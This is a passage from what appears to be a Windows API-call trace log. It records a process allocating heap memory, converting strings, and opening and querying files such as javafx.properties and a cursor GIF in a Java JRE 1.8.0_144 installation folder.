Flags=0x0, Size=0x4) returned 0x7cf10 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0097.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0097.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0097.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0097.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.246] AreFileApisANSI () returned 1 [0097.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 80 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.246] AreFileApisANSI () returned 1 [0097.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0097.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 80 [0097.246] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.247] GetFileType (hFile=0x33c) returned 0x1 [0097.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0097.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.248] CloseHandle (hObject=0x33c) returned 1 [0097.248] AreFileApisANSI () returned 1 [0097.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0097.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 80 [0097.248] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.248] GetFileType (hFile=0x33c) returned 0x1 [0097.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0097.248] CloseHandle (hObject=0x33c) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.250] AreFileApisANSI () returned 1 [0097.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0097.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 80 [0097.250] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99)) returned 1 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0097.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.250] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.250] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x9e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f850, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x9e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\i", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓\x99")) returned 0 [0097.250] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0097.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0097.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0097.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0097.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.252] AreFileApisANSI () returned 1 [0097.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties", lpUsedDefaultChar=0x0) returned 57 [0097.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.252] AreFileApisANSI () returned 1 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0097.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 57 [0097.252] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.252] GetFileType (hFile=0x368) returned 0x1 [0097.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0097.253] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.253] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.253] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.253] CloseHandle (hObject=0x368) returned 1 [0097.253] AreFileApisANSI () returned 1 [0097.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0097.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0097.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 57 [0097.253] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.253] GetFileType (hFile=0x368) returned 0x1 [0097.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.254] CloseHandle (hObject=0x368) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.255] AreFileApisANSI () returned 1 [0097.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0097.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0097.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 57 [0097.255] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, 